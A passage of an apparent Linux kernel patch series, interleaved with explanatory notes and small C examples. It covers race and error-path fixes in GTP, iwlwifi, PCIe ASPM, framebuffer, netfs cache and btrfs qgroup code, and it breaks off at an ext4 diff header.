+ 		else
+ 			gtp->sk1u = NULL;
+-		udp_sk(sk)->encap_type = 0;
++		WRITE_ONCE(udp_sk(sk)->encap_type, 0);
+ 		rcu_assign_sk_user_data(sk, NULL);
+ 		release_sock(sk);
+ 		sock_put(sk);
+@@ -681,7 +681,7 @@ static int gtp_encap_recv(struct sock *sk, struct sk_buff *skb)
+ 
+ 	netdev_dbg(gtp->dev, "encap_recv sk=%p\n", sk);
+ 
+-	switch (udp_sk(sk)->encap_type) {
++	switch (READ_ONCE(udp_sk(sk)->encap_type)) {
+ 	case UDP_ENCAP_GTP0:
+ 		netdev_dbg(gtp->dev, "received GTP0 packet\n");
+ 		ret = gtp0_udp_encap_recv(gtp, skb);
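
encap_type is written in __gtp_encap_destroy() and read in the receive path without a common lock, so the gtp hunks mark both sides with WRITE_ONCE()/READ_ONCE() to rule out compiler tearing or refetching. The closest userspace analogue is a relaxed C11 atomic; a sketch (the GTP constants below are stand-ins):

  #include <stdatomic.h>
  #include <stdio.h>

  #define UDP_ENCAP_GTP0  1
  #define UDP_ENCAP_GTP1U 2

  /* One side clears the field, the other dispatches on a single
   * untorn load of it; relaxed atomics give roughly the guarantee
   * the kernel gets from READ_ONCE()/WRITE_ONCE(). */
  static _Atomic unsigned char encap_type;

  static void encap_destroy(void)
  {
          atomic_store_explicit(&encap_type, 0, memory_order_relaxed);
  }

  static int encap_recv(void)
  {
          switch (atomic_load_explicit(&encap_type, memory_order_relaxed)) {
          case UDP_ENCAP_GTP0:  return 0;
          case UDP_ENCAP_GTP1U: return 0;
          default:              return -1;  /* not ours, pass packet up */
          }
  }

  int main(void)
  {
          atomic_store_explicit(&encap_type, UDP_ENCAP_GTP0,
                                memory_order_relaxed);
          printf("recv -> %d\n", encap_recv());
          encap_destroy();
          printf("recv -> %d\n", encap_recv());
          return 0;
  }
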
+diff --git a/drivers/net/usb/ax88172a.c b/drivers/net/usb/ax88172a.c
+index 3777c7e2e6fc0..e47bb125048d4 100644
+--- a/drivers/net/usb/ax88172a.c
++++ b/drivers/net/usb/ax88172a.c
+@@ -161,7 +161,9 @@ static int ax88172a_bind(struct usbnet *dev, struct usb_interface *intf)
+ 	u8 buf[ETH_ALEN];
+ 	struct ax88172a_private *priv;
+ 
+-	usbnet_get_endpoints(dev, intf);
++	ret = usbnet_get_endpoints(dev, intf);
++	if (ret)
++		return ret;
+ 
+ 	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+ 	if (!priv)
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-prph.h b/drivers/net/wireless/intel/iwlwifi/iwl-prph.h
+index 157d1f31c4871..c5a306b01fe20 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-prph.h
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-prph.h
+@@ -348,8 +348,8 @@
+ #define RFIC_REG_RD			0xAD0470
+ #define WFPM_CTRL_REG			0xA03030
+ #define WFPM_OTP_CFG1_ADDR		0x00a03098
+-#define WFPM_OTP_CFG1_IS_JACKET_BIT	BIT(4)
+-#define WFPM_OTP_CFG1_IS_CDB_BIT	BIT(5)
++#define WFPM_OTP_CFG1_IS_JACKET_BIT	BIT(5)
++#define WFPM_OTP_CFG1_IS_CDB_BIT	BIT(4)
+ 
+ #define WFPM_GP2			0xA030B4
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/internal.h b/drivers/net/wireless/intel/iwlwifi/pcie/internal.h
+index 69b95ad5993b0..2ec4ee8ab317c 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/internal.h
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/internal.h
+@@ -745,7 +745,7 @@ static inline void iwl_enable_rfkill_int(struct iwl_trans *trans)
+ 	}
+ }
+ 
+-void iwl_pcie_handle_rfkill_irq(struct iwl_trans *trans);
++void iwl_pcie_handle_rfkill_irq(struct iwl_trans *trans, bool from_irq);
+ 
+ static inline bool iwl_is_rfkill_set(struct iwl_trans *trans)
+ {
+@@ -792,7 +792,7 @@ static inline bool iwl_pcie_dbg_on(struct iwl_trans *trans)
+ 	return (trans->dbg.dest_tlv || iwl_trans_dbg_ini_valid(trans));
+ }
+ 
+-void iwl_trans_pcie_rf_kill(struct iwl_trans *trans, bool state);
++void iwl_trans_pcie_rf_kill(struct iwl_trans *trans, bool state, bool from_irq);
+ void iwl_trans_pcie_dump_regs(struct iwl_trans *trans);
+ 
+ #ifdef CONFIG_IWLWIFI_DEBUGFS
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/rx.c b/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
+index 90a46faaaffdf..57a11ee05bc36 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
+@@ -1781,7 +1781,7 @@ static u32 iwl_pcie_int_cause_ict(struct iwl_trans *trans)
+ 	return inta;
+ }
+ 
+-void iwl_pcie_handle_rfkill_irq(struct iwl_trans *trans)
++void iwl_pcie_handle_rfkill_irq(struct iwl_trans *trans, bool from_irq)
+ {
+ 	struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans);
+ 	struct isr_statistics *isr_stats = &trans_pcie->isr_stats;
+@@ -1805,7 +1805,7 @@ void iwl_pcie_handle_rfkill_irq(struct iwl_trans *trans)
+ 	isr_stats->rfkill++;
+ 
+ 	if (prev != report)
+-		iwl_trans_pcie_rf_kill(trans, report);
++		iwl_trans_pcie_rf_kill(trans, report, from_irq);
+ 	mutex_unlock(&trans_pcie->mutex);
+ 
+ 	if (hw_rfkill) {
+@@ -1945,7 +1945,7 @@ irqreturn_t iwl_pcie_irq_handler(int irq, void *dev_id)
+ 
+ 	/* HW RF KILL switch toggled */
+ 	if (inta & CSR_INT_BIT_RF_KILL) {
+-		iwl_pcie_handle_rfkill_irq(trans);
++		iwl_pcie_handle_rfkill_irq(trans, true);
+ 		handled |= CSR_INT_BIT_RF_KILL;
+ 	}
+ 
+@@ -2362,7 +2362,7 @@ irqreturn_t iwl_pcie_irq_msix_handler(int irq, void *dev_id)
+ 
+ 	/* HW RF KILL switch toggled */
+ 	if (inta_hw & MSIX_HW_INT_CAUSES_REG_RF_KILL)
+-		iwl_pcie_handle_rfkill_irq(trans);
++		iwl_pcie_handle_rfkill_irq(trans, true);
+ 
+ 	if (inta_hw & MSIX_HW_INT_CAUSES_REG_HW_ERR) {
+ 		IWL_ERR(trans,
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+index 796972f224326..c7ed35b3dd8d5 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+@@ -1080,7 +1080,7 @@ bool iwl_pcie_check_hw_rf_kill(struct iwl_trans *trans)
+ 	report = test_bit(STATUS_RFKILL_OPMODE, &trans->status);
+ 
+ 	if (prev != report)
+-		iwl_trans_pcie_rf_kill(trans, report);
++		iwl_trans_pcie_rf_kill(trans, report, false);
+ 
+ 	return hw_rfkill;
+ }
+@@ -1234,7 +1234,7 @@ static void iwl_pcie_init_msix(struct iwl_trans_pcie *trans_pcie)
+ 	trans_pcie->hw_mask = trans_pcie->hw_init_mask;
+ }
+ 
+-static void _iwl_trans_pcie_stop_device(struct iwl_trans *trans)
++static void _iwl_trans_pcie_stop_device(struct iwl_trans *trans, bool from_irq)
+ {
+ 	struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans);
+ 
+@@ -1261,7 +1261,8 @@ static void _iwl_trans_pcie_stop_device(struct iwl_trans *trans)
+ 	if (test_and_clear_bit(STATUS_DEVICE_ENABLED, &trans->status)) {
+ 		IWL_DEBUG_INFO(trans,
+ 			       "DEVICE_ENABLED bit was set and is now cleared\n");
+-		iwl_pcie_synchronize_irqs(trans);
++		if (!from_irq)
++			iwl_pcie_synchronize_irqs(trans);
+ 		iwl_pcie_rx_napi_sync(trans);
+ 		iwl_pcie_tx_stop(trans);
+ 		iwl_pcie_rx_stop(trans);
+@@ -1451,7 +1452,7 @@ void iwl_trans_pcie_handle_stop_rfkill(struct iwl_trans *trans,
+ 		clear_bit(STATUS_RFKILL_OPMODE, &trans->status);
+ 	}
+ 	if (hw_rfkill != was_in_rfkill)
+-		iwl_trans_pcie_rf_kill(trans, hw_rfkill);
++		iwl_trans_pcie_rf_kill(trans, hw_rfkill, false);
+ }
+ 
+ static void iwl_trans_pcie_stop_device(struct iwl_trans *trans)
+@@ -1466,12 +1467,12 @@ static void iwl_trans_pcie_stop_device(struct iwl_trans *trans)
+ 	mutex_lock(&trans_pcie->mutex);
+ 	trans_pcie->opmode_down = true;
+ 	was_in_rfkill = test_bit(STATUS_RFKILL_OPMODE, &trans->status);
+-	_iwl_trans_pcie_stop_device(trans);
++	_iwl_trans_pcie_stop_device(trans, false);
+ 	iwl_trans_pcie_handle_stop_rfkill(trans, was_in_rfkill);
+ 	mutex_unlock(&trans_pcie->mutex);
+ }
+ 
+-void iwl_trans_pcie_rf_kill(struct iwl_trans *trans, bool state)
++void iwl_trans_pcie_rf_kill(struct iwl_trans *trans, bool state, bool from_irq)
+ {
+ 	struct iwl_trans_pcie __maybe_unused *trans_pcie =
+ 		IWL_TRANS_GET_PCIE_TRANS(trans);
+@@ -1484,7 +1485,7 @@ void iwl_trans_pcie_rf_kill(struct iwl_trans *trans, bool state)
+ 		if (trans->trans_cfg->gen2)
+ 			_iwl_trans_pcie_gen2_stop_device(trans);
+ 		else
+-			_iwl_trans_pcie_stop_device(trans);
++			_iwl_trans_pcie_stop_device(trans, from_irq);
+ 	}
+ }
+ 
+@@ -2815,7 +2816,7 @@ static ssize_t iwl_dbgfs_rfkill_write(struct file *file,
+ 	IWL_WARN(trans, "changing debug rfkill %d->%d\n",
+ 		 trans_pcie->debug_rfkill, new_value);
+ 	trans_pcie->debug_rfkill = new_value;
+-	iwl_pcie_handle_rfkill_irq(trans);
++	iwl_pcie_handle_rfkill_irq(trans, false);
+ 
+ 	return count;
+ }
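
The from_irq flag threaded through the iwlwifi stop path above lets _iwl_trans_pcie_stop_device() skip iwl_pcie_synchronize_irqs() when the stop was triggered from the interrupt handler itself; waiting there for in-flight handlers to finish would mean waiting for the caller. A stripped-down sketch of that self-wait guard (hypothetical names):

  #include <stdbool.h>
  #include <stdio.h>

  /* Would block until all interrupt handlers have returned; calling
   * it from inside a handler could therefore never complete. */
  static void synchronize_irqs(void)
  {
  }

  static void stop_device(bool from_irq)
  {
          if (!from_irq)
                  synchronize_irqs();     /* safe: not inside the handler */
          puts(from_irq ? "stopped (from irq, sync skipped)"
                        : "stopped (irqs synchronized)");
  }

  int main(void)
  {
          stop_device(false);     /* ordinary teardown */
          stop_device(true);      /* rfkill toggled inside the handler */
          return 0;
  }
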
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 8df156c28aade..5368a37154cf9 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -1302,6 +1302,9 @@ static int pci_set_full_power_state(struct pci_dev *dev)
+ 		pci_restore_bars(dev);
+ 	}
+ 
++	if (dev->bus->self)
++		pcie_aspm_pm_state_change(dev->bus->self);
++
+ 	return 0;
+ }
+ 
+@@ -1396,6 +1399,9 @@ static int pci_set_low_power_state(struct pci_dev *dev, pci_power_t state)
+ 				     pci_power_name(dev->current_state),
+ 				     pci_power_name(state));
+ 
++	if (dev->bus->self)
++		pcie_aspm_pm_state_change(dev->bus->self);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/pci/pci.h b/drivers/pci/pci.h
+index ffccb03933e27..ed6d75d138c7a 100644
+--- a/drivers/pci/pci.h
++++ b/drivers/pci/pci.h
+@@ -561,10 +561,12 @@ bool pcie_wait_for_link(struct pci_dev *pdev, bool active);
+ #ifdef CONFIG_PCIEASPM
+ void pcie_aspm_init_link_state(struct pci_dev *pdev);
+ void pcie_aspm_exit_link_state(struct pci_dev *pdev);
++void pcie_aspm_pm_state_change(struct pci_dev *pdev);
+ void pcie_aspm_powersave_config_link(struct pci_dev *pdev);
+ #else
+ static inline void pcie_aspm_init_link_state(struct pci_dev *pdev) { }
+ static inline void pcie_aspm_exit_link_state(struct pci_dev *pdev) { }
++static inline void pcie_aspm_pm_state_change(struct pci_dev *pdev) { }
+ static inline void pcie_aspm_powersave_config_link(struct pci_dev *pdev) { }
+ #endif
+ 
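
The pci.h hunk extends an idiom worth noting: each CONFIG_PCIEASPM function gets an empty static inline twin in the #else branch, so callers like pci_set_full_power_state() never need #ifdefs and the no-op compiles away when ASPM is off. The idiom in a self-contained form (build without -DCONFIG_PCIEASPM to exercise the stub):

  #include <stdio.h>

  struct pci_dev { int id; };

  #ifdef CONFIG_PCIEASPM
  /* The real implementation would be linked in from aspm.c. */
  void pcie_aspm_pm_state_change(struct pci_dev *pdev);
  #else
  /* Feature compiled out: the empty inline vanishes at -O1 and up. */
  static inline void pcie_aspm_pm_state_change(struct pci_dev *pdev)
  {
          (void)pdev;
  }
  #endif

  int main(void)
  {
          struct pci_dev dev = { .id = 1 };

          pcie_aspm_pm_state_change(&dev);  /* no #ifdef at the call site */
          puts("ok");
          return 0;
  }
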
+diff --git a/drivers/pci/pcie/aspm.c b/drivers/pci/pcie/aspm.c
+index 5d1756f53ba84..25736d408e88e 100644
+--- a/drivers/pci/pcie/aspm.c
++++ b/drivers/pci/pcie/aspm.c
+@@ -1055,6 +1055,25 @@ void pcie_aspm_exit_link_state(struct pci_dev *pdev)
+ 	up_read(&pci_bus_sem);
+ }
+ 
++/* @pdev: the root port or switch downstream port */
++void pcie_aspm_pm_state_change(struct pci_dev *pdev)
++{
++	struct pcie_link_state *link = pdev->link_state;
++
++	if (aspm_disabled || !link)
++		return;
++	/*
++	 * Devices changed PM state, we should recheck if latency
++	 * meets all functions' requirement
++	 */
++	down_read(&pci_bus_sem);
++	mutex_lock(&aspm_lock);
++	pcie_update_aspm_capable(link->root);
++	pcie_config_aspm_path(link);
++	mutex_unlock(&aspm_lock);
++	up_read(&pci_bus_sem);
++}
++
+ void pcie_aspm_powersave_config_link(struct pci_dev *pdev)
+ {
+ 	struct pcie_link_state *link = pdev->link_state;
+diff --git a/drivers/video/fbdev/imsttfb.c b/drivers/video/fbdev/imsttfb.c
+index b194e71f07bfc..aa51cb72cbba5 100644
+--- a/drivers/video/fbdev/imsttfb.c
++++ b/drivers/video/fbdev/imsttfb.c
+@@ -1419,7 +1419,6 @@ static int init_imstt(struct fb_info *info)
+ 	if ((info->var.xres * info->var.yres) * (info->var.bits_per_pixel >> 3) > info->fix.smem_len
+ 	    || !(compute_imstt_regvals(par, info->var.xres, info->var.yres))) {
+ 		printk("imsttfb: %ux%ux%u not supported\n", info->var.xres, info->var.yres, info->var.bits_per_pixel);
+-		framebuffer_release(info);
+ 		return -ENODEV;
+ 	}
+ 
+@@ -1452,10 +1451,11 @@ static int init_imstt(struct fb_info *info)
+ 	              FBINFO_HWACCEL_FILLRECT |
+ 	              FBINFO_HWACCEL_YPAN;
+ 
+-	fb_alloc_cmap(&info->cmap, 0, 0);
++	if (fb_alloc_cmap(&info->cmap, 0, 0))
++		return -ENODEV;
+ 
+ 	if (register_framebuffer(info) < 0) {
+-		framebuffer_release(info);
++		fb_dealloc_cmap(&info->cmap);
+ 		return -ENODEV;
+ 	}
+ 
+diff --git a/fs/9p/cache.c b/fs/9p/cache.c
+index cebba4eaa0b57..12c0ae29f1857 100644
+--- a/fs/9p/cache.c
++++ b/fs/9p/cache.c
+@@ -68,6 +68,8 @@ void v9fs_cache_inode_get_cookie(struct inode *inode)
+ 				       &path, sizeof(path),
+ 				       &version, sizeof(version),
+ 				       i_size_read(&v9inode->netfs.inode));
++	if (v9inode->netfs.cache)
++		mapping_set_release_always(inode->i_mapping);
+ 
+ 	p9_debug(P9_DEBUG_FSC, "inode %p get cookie %p\n",
+ 		 inode, v9fs_inode_cookie(v9inode));
+diff --git a/fs/afs/internal.h b/fs/afs/internal.h
+index fcbb598d8c85d..a25fdc3e52310 100644
+--- a/fs/afs/internal.h
++++ b/fs/afs/internal.h
+@@ -682,6 +682,8 @@ static inline void afs_vnode_set_cache(struct afs_vnode *vnode,
+ {
+ #ifdef CONFIG_AFS_FSCACHE
+ 	vnode->netfs.cache = cookie;
++	if (cookie)
++		mapping_set_release_always(vnode->netfs.inode.i_mapping);
+ #endif
+ }
+ 
+diff --git a/fs/btrfs/delalloc-space.c b/fs/btrfs/delalloc-space.c
+index 0b62ce77053f5..f2bc5563c0f92 100644
+--- a/fs/btrfs/delalloc-space.c
++++ b/fs/btrfs/delalloc-space.c
+@@ -197,7 +197,7 @@ void btrfs_free_reserved_data_space(struct btrfs_inode *inode,
+ 	start = round_down(start, fs_info->sectorsize);
+ 
+ 	btrfs_free_reserved_data_space_noquota(fs_info, len);
+-	btrfs_qgroup_free_data(inode, reserved, start, len);
++	btrfs_qgroup_free_data(inode, reserved, start, len, NULL);
+ }
+ 
+ /**
+diff --git a/fs/btrfs/file-item.c b/fs/btrfs/file-item.c
+index b14d2da9b26d3..14478da875313 100644
+--- a/fs/btrfs/file-item.c
++++ b/fs/btrfs/file-item.c
+@@ -602,7 +602,7 @@ int btrfs_lookup_csums_range(struct btrfs_root *root, u64 start, u64 end,
+ 			}
+ 
+ 			sums->bytenr = start;
+-			sums->len = (int)size;
++			sums->len = size;
+ 
+ 			offset = (start - key.offset) >> fs_info->sectorsize_bits;
+ 			offset *= csum_size;
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index 0a46fff3dd067..1783a0fbf1665 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -3191,7 +3191,7 @@ static long btrfs_fallocate(struct file *file, int mode,
+ 			qgroup_reserved -= range->len;
+ 		} else if (qgroup_reserved > 0) {
+ 			btrfs_qgroup_free_data(BTRFS_I(inode), data_reserved,
+-					       range->start, range->len);
++					       range->start, range->len, NULL);
+ 			qgroup_reserved -= range->len;
+ 		}
+ 		list_del(&range->list);
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 81eac121c6b23..9a7d77c410e22 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -466,7 +466,7 @@ out:
+ 	 * And at reserve time, it's always aligned to page size, so
+ 	 * just free one page here.
+ 	 */
+-	btrfs_qgroup_free_data(inode, NULL, 0, PAGE_SIZE);
++	btrfs_qgroup_free_data(inode, NULL, 0, PAGE_SIZE, NULL);
+ 	btrfs_free_path(path);
+ 	btrfs_end_transaction(trans);
+ 	return ret;
+@@ -5372,7 +5372,7 @@ static void evict_inode_truncate_pages(struct inode *inode)
+ 		 */
+ 		if (state_flags & EXTENT_DELALLOC)
+ 			btrfs_qgroup_free_data(BTRFS_I(inode), NULL, start,
+-					       end - start + 1);
++					       end - start + 1, NULL);
+ 
+ 		clear_extent_bit(io_tree, start, end,
+ 				 EXTENT_CLEAR_ALL_BITS | EXTENT_DO_ACCOUNTING,
+@@ -8440,7 +8440,7 @@ next:
+ 		 *    reserved data space.
+ 		 *    Since the IO will never happen for this page.
+ 		 */
+-		btrfs_qgroup_free_data(inode, NULL, cur, range_end + 1 - cur);
++		btrfs_qgroup_free_data(inode, NULL, cur, range_end + 1 - cur, NULL);
+ 		if (!inode_evicting) {
+ 			clear_extent_bit(tree, cur, range_end, EXTENT_LOCKED |
+ 				 EXTENT_DELALLOC | EXTENT_UPTODATE |
+@@ -9902,7 +9902,7 @@ static struct btrfs_trans_handle *insert_prealloc_file_extent(
+ 	struct btrfs_path *path;
+ 	u64 start = ins->objectid;
+ 	u64 len = ins->offset;
+-	int qgroup_released;
++	u64 qgroup_released = 0;
+ 	int ret;
+ 
+ 	memset(&stack_fi, 0, sizeof(stack_fi));
+@@ -9915,9 +9915,9 @@ static struct btrfs_trans_handle *insert_prealloc_file_extent(
+ 	btrfs_set_stack_file_extent_compression(&stack_fi, BTRFS_COMPRESS_NONE);
+ 	/* Encryption and other encoding is reserved and all 0 */
+ 
+-	qgroup_released = btrfs_qgroup_release_data(inode, file_offset, len);
+-	if (qgroup_released < 0)
+-		return ERR_PTR(qgroup_released);
++	ret = btrfs_qgroup_release_data(inode, file_offset, len, &qgroup_released);
++	if (ret < 0)
++		return ERR_PTR(ret);
+ 
+ 	if (trans) {
+ 		ret = insert_reserved_file_extent(trans, inode,
+@@ -10903,7 +10903,7 @@ out_delalloc_release:
+ 	btrfs_delalloc_release_metadata(inode, disk_num_bytes, ret < 0);
+ out_qgroup_free_data:
+ 	if (ret < 0)
+-		btrfs_qgroup_free_data(inode, data_reserved, start, num_bytes);
++		btrfs_qgroup_free_data(inode, data_reserved, start, num_bytes, NULL);
+ out_free_data_space:
+ 	/*
+ 	 * If btrfs_reserve_extent() succeeded, then we already decremented
+diff --git a/fs/btrfs/ordered-data.c b/fs/btrfs/ordered-data.c
+index 0321753c16b9f..1b2af4785c0e2 100644
+--- a/fs/btrfs/ordered-data.c
++++ b/fs/btrfs/ordered-data.c
+@@ -172,11 +172,12 @@ int btrfs_add_ordered_extent(struct btrfs_inode *inode, u64 file_offset,
+ 	struct rb_node *node;
+ 	struct btrfs_ordered_extent *entry;
+ 	int ret;
++	u64 qgroup_rsv = 0;
+ 
+ 	if (flags &
+ 	    ((1 << BTRFS_ORDERED_NOCOW) | (1 << BTRFS_ORDERED_PREALLOC))) {
+ 		/* For nocow write, we can release the qgroup rsv right now */
+-		ret = btrfs_qgroup_free_data(inode, NULL, file_offset, num_bytes);
++		ret = btrfs_qgroup_free_data(inode, NULL, file_offset, num_bytes, &qgroup_rsv);
+ 		if (ret < 0)
+ 			return ret;
+ 		ret = 0;
+@@ -185,7 +186,7 @@ int btrfs_add_ordered_extent(struct btrfs_inode *inode, u64 file_offset,
+ 		 * The ordered extent has reserved qgroup space, release now
+ 		 * and pass the reserved number for qgroup_record to free.
+ 		 */
+-		ret = btrfs_qgroup_release_data(inode, file_offset, num_bytes);
++		ret = btrfs_qgroup_release_data(inode, file_offset, num_bytes, &qgroup_rsv);
+ 		if (ret < 0)
+ 			return ret;
+ 	}
+@@ -203,7 +204,7 @@ int btrfs_add_ordered_extent(struct btrfs_inode *inode, u64 file_offset,
+ 	entry->inode = igrab(&inode->vfs_inode);
+ 	entry->compress_type = compress_type;
+ 	entry->truncated_len = (u64)-1;
+-	entry->qgroup_rsv = ret;
++	entry->qgroup_rsv = qgroup_rsv;
+ 	entry->physical = (u64)-1;
+ 
+ 	ASSERT((flags & ~BTRFS_ORDERED_TYPE_FLAGS) == 0);
+diff --git a/fs/btrfs/ordered-data.h b/fs/btrfs/ordered-data.h
+index f59f2dbdb25ed..cc3ca4bb9bd54 100644
+--- a/fs/btrfs/ordered-data.h
++++ b/fs/btrfs/ordered-data.h
+@@ -20,7 +20,7 @@ struct btrfs_ordered_sum {
+ 	/*
+ 	 * this is the length in bytes covered by the sums array below.
+ 	 */
+-	int len;
++	u32 len;
+ 	struct list_head list;
+ 	/* last field is a variable length array of csums */
+ 	u8 sums[];
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index 26cabffd59710..96ec9ccc2ef61 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -3833,13 +3833,14 @@ int btrfs_qgroup_reserve_data(struct btrfs_inode *inode,
+ 
+ /* Free ranges specified by @reserved, normally in error path */
+ static int qgroup_free_reserved_data(struct btrfs_inode *inode,
+-			struct extent_changeset *reserved, u64 start, u64 len)
++				     struct extent_changeset *reserved,
++				     u64 start, u64 len, u64 *freed_ret)
+ {
+ 	struct btrfs_root *root = inode->root;
+ 	struct ulist_node *unode;
+ 	struct ulist_iterator uiter;
+ 	struct extent_changeset changeset;
+-	int freed = 0;
++	u64 freed = 0;
+ 	int ret;
+ 
+ 	extent_changeset_init(&changeset);
+@@ -3880,7 +3881,9 @@ static int qgroup_free_reserved_data(struct btrfs_inode *inode,
+ 	}
+ 	btrfs_qgroup_free_refroot(root->fs_info, root->root_key.objectid, freed,
+ 				  BTRFS_QGROUP_RSV_DATA);
+-	ret = freed;
++	if (freed_ret)
++		*freed_ret = freed;
++	ret = 0;
+ out:
+ 	extent_changeset_release(&changeset);
+ 	return ret;
+@@ -3888,7 +3891,7 @@ out:
+ 
+ static int __btrfs_qgroup_release_data(struct btrfs_inode *inode,
+ 			struct extent_changeset *reserved, u64 start, u64 len,
+-			int free)
++			u64 *released, int free)
+ {
+ 	struct extent_changeset changeset;
+ 	int trace_op = QGROUP_RELEASE;
+@@ -3900,7 +3903,7 @@ static int __btrfs_qgroup_release_data(struct btrfs_inode *inode,
+ 	/* In release case, we shouldn't have @reserved */
+ 	WARN_ON(!free && reserved);
+ 	if (free && reserved)
+-		return qgroup_free_reserved_data(inode, reserved, start, len);
++		return qgroup_free_reserved_data(inode, reserved, start, len, released);
+ 	extent_changeset_init(&changeset);
+ 	ret = clear_record_extent_bits(&inode->io_tree, start, start + len -1,
+ 				       EXTENT_QGROUP_RESERVED, &changeset);
+@@ -3915,7 +3918,8 @@ static int __btrfs_qgroup_release_data(struct btrfs_inode *inode,
+ 		btrfs_qgroup_free_refroot(inode->root->fs_info,
+ 				inode->root->root_key.objectid,
+ 				changeset.bytes_changed, BTRFS_QGROUP_RSV_DATA);
+-	ret = changeset.bytes_changed;
++	if (released)
++		*released = changeset.bytes_changed;
+ out:
+ 	extent_changeset_release(&changeset);
+ 	return ret;
+@@ -3934,9 +3938,10 @@ out:
+  * NOTE: This function may sleep for memory allocation.
+  */
+ int btrfs_qgroup_free_data(struct btrfs_inode *inode,
+-			struct extent_changeset *reserved, u64 start, u64 len)
++			   struct extent_changeset *reserved,
++			   u64 start, u64 len, u64 *freed)
+ {
+-	return __btrfs_qgroup_release_data(inode, reserved, start, len, 1);
++	return __btrfs_qgroup_release_data(inode, reserved, start, len, freed, 1);
+ }
+ 
+ /*
+@@ -3954,9 +3959,9 @@ int btrfs_qgroup_free_data(struct btrfs_inode *inode,
+  *
+  * NOTE: This function may sleep for memory allocation.
+  */
+-int btrfs_qgroup_release_data(struct btrfs_inode *inode, u64 start, u64 len)
++int btrfs_qgroup_release_data(struct btrfs_inode *inode, u64 start, u64 len, u64 *released)
+ {
+-	return __btrfs_qgroup_release_data(inode, NULL, start, len, 0);
++	return __btrfs_qgroup_release_data(inode, NULL, start, len, released, 0);
+ }
+ 
+ static void add_root_meta_rsv(struct btrfs_root *root, int num_bytes,
+diff --git a/fs/btrfs/qgroup.h b/fs/btrfs/qgroup.h
+index 578c77e94200f..c382923f7628e 100644
+--- a/fs/btrfs/qgroup.h
++++ b/fs/btrfs/qgroup.h
+@@ -360,10 +360,10 @@ int btrfs_verify_qgroup_counts(struct btrfs_fs_info *fs_info, u64 qgroupid,
+ /* New io_tree based accurate qgroup reserve API */
+ int btrfs_qgroup_reserve_data(struct btrfs_inode *inode,
+ 			struct extent_changeset **reserved, u64 start, u64 len);
+-int btrfs_qgroup_release_data(struct btrfs_inode *inode, u64 start, u64 len);
++int btrfs_qgroup_release_data(struct btrfs_inode *inode, u64 start, u64 len, u64 *released);
+ int btrfs_qgroup_free_data(struct btrfs_inode *inode,
+ 			   struct extent_changeset *reserved, u64 start,
+-			   u64 len);
++			   u64 len, u64 *freed);
+ int btrfs_qgroup_reserve_meta(struct btrfs_root *root, int num_bytes,
+ 			      enum btrfs_qgroup_rsv_type type, bool enforce);
+ int __btrfs_qgroup_reserve_meta(struct btrfs_root *root, int num_bytes,
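
The qgroup API change running through the btrfs hunks swaps "byte count or negative errno in one int" for "errno as the return value, byte count through an optional u64 pointer". The old convention silently truncates or misreads any range of 2 GiB or more; a compilable before/after comparison:

  #include <stdint.h>
  #include <stdio.h>

  /* Old shape: the count shares an int with the error code, so a
   * release of >= 2^31 bytes comes back negative and looks like an
   * errno to the caller. */
  static int release_data_old(uint64_t len)
  {
          return (int)len;
  }

  /* New shape, as in the hunks above: status in the return value,
   * the full 64-bit count through an optional out-parameter. */
  static int release_data_new(uint64_t len, uint64_t *released)
  {
          if (released)
                  *released = len;
          return 0;
  }

  int main(void)
  {
          uint64_t len = 3ull << 30;      /* 3 GiB */
          uint64_t released = 0;

          printf("old: %d (bogus)\n", release_data_old(len));
          release_data_new(len, &released);
          printf("new: ret=0, released=%llu\n",
                 (unsigned long long)released);
          return 0;
  }
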
+diff --git a/fs/cachefiles/namei.c b/fs/cachefiles/namei.c
+index 03ca8f2f657ab..50b2ee163af60 100644
+--- a/fs/cachefiles/namei.c
++++ b/fs/cachefiles/namei.c
+@@ -584,6 +584,8 @@ static bool cachefiles_open_file(struct cachefiles_object *object,
+ 	if (ret < 0)
+ 		goto check_failed;
+ 
++	clear_bit(FSCACHE_COOKIE_NO_DATA_TO_READ, &object->cookie->flags);
++
+ 	object->file = file;
+ 
+ 	/* Always update the atime on an object we've just looked up (this is
+diff --git a/fs/ceph/cache.c b/fs/ceph/cache.c
+index 177d8e8d73fe4..de1dee46d3df7 100644
+--- a/fs/ceph/cache.c
++++ b/fs/ceph/cache.c
+@@ -36,6 +36,8 @@ void ceph_fscache_register_inode_cookie(struct inode *inode)
+ 				       &ci->i_vino, sizeof(ci->i_vino),
+ 				       &ci->i_version, sizeof(ci->i_version),
+ 				       i_size_read(inode));
++	if (ci->netfs.cache)
++		mapping_set_release_always(inode->i_mapping);
+ }
+ 
+ void ceph_fscache_unregister_inode_cookie(struct ceph_inode_info *ci)
+diff --git a/fs/ext4/move_extent.c b/fs/ext4/move_extent.c
+index 044e34cd835c1..dedc9d445f243 100644
+--- a/fs/ext4/move_extent.c
++++ b/fs/ext4/move_extent.c
